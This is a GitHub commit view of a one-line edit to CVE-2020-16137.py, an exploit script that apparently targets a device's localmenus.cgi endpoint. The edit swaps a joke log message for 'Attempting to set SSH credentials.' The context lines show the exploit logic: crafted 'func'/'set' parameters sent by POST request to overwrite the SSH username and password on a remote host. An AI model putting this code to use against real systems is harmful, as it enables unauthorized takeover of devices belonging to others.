Update CVE-2020-16137.py

Removed jest and included more useful information.
This commit is contained in:
debifrank
2020-08-12 11:24:20 -04:00
committed by GitHub
parent e5e8c19575
commit d43e071a7e
+1 -1
View File
@@ -61,7 +61,7 @@ def run(args):
url = "http://{}/localmenus.cgi".format(args['rhost'])
payload_user = {"func": "403", "set": "401", "name1": args['USER'], "name2": args['USER']}
payload_pass = {"func": "403", "set": "402", "pwd1": args['PASS'], "pwd2": args['PASS']}
logging.info("FIRING ZE MIZZLES!")
logging.info("Attempting to set SSH credentials.")
try:
r = requests.post(url=url, params=payload_user, timeout=int(args['TIMEOUT']))
if r.status_code != 200: